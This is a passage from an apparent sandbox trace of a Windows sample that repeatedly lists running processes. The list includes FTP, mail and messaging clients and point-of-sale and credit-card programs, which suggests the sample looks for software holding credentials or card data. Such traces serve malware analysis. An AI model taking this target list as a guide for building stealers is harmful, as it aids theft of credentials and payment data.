pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0271.976] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0271.978] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0271.980] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0272.050] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0272.052] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0272.054] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0272.056] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0272.057] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0272.060] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0272.065] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0272.067] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0272.069] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0272.071] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0272.073] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0272.079] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0272.081] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0272.083] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0272.085] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0272.087] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0272.089] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0272.148] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0272.149] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0272.151] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0272.153] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0272.155] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0272.157] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0272.159] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0272.161] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0272.164] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0272.166] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0272.168] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0272.170] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0272.172] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0272.173] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0272.175] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0272.177] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0272.178] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0272.180] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0272.182] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0272.184] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0272.192] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0272.194] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0272.196] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0272.198] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0272.199] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0272.201] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0272.203] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0272.205] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0272.206] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0272.208] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0272.210] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0272.211] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0272.213] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0272.216] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0272.218] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0272.220] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0272.221] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0272.223] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0272.225] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0272.226] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0272.228] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0272.229] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0272.266] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0272.269] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0272.271] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0272.273] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0272.275] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0272.282] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0272.285] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0272.286] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0272.288] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0272.289] CloseHandle (hObject=0x9e0) returned 1 [0272.289] Sleep (dwMilliseconds=0x64) [0272.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0272.454] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.455] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0272.457] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0272.458] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.460] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0272.462] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.464] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0272.469] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0272.471] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0272.472] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.474] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.476] Process32Next (in: 